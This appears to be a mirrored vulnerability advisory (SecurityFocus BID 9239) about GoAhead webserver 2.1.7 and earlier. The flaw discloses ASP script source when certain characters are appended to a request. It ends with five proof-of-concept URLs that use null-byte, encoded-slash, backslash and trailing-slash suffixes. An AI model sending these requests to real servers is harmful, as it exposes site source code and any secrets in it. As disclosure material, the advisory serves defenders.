13 lines
No EOL
671 B
Text
13 lines
No EOL
671 B
Text
source: http://www.securityfocus.com/bid/9239/info
|
|
|
|
A vulnerability in GoAhead webserver may result in the disclosure of the source code of ASP script files. The vulnerability occurs because the application fails to sanitize HTTP requests.
|
|
|
|
An attacker can append certain characters to the end of an HTTP request for a specific ASP file. As a result, GoAhead webserver will disclose the contents of the requested ASP script file to the attacker.
|
|
|
|
This issue affects GoAhead 2.1.7 and earlier.
|
|
|
|
http://www.example.com/asp.asp%00
|
|
http://www.example.com/asp.asp%2f
|
|
http://www.example.com/asp.asp%5c
|
|
http://www.example.com/asp.asp/
|
|
http://www.example.com/asp.asp |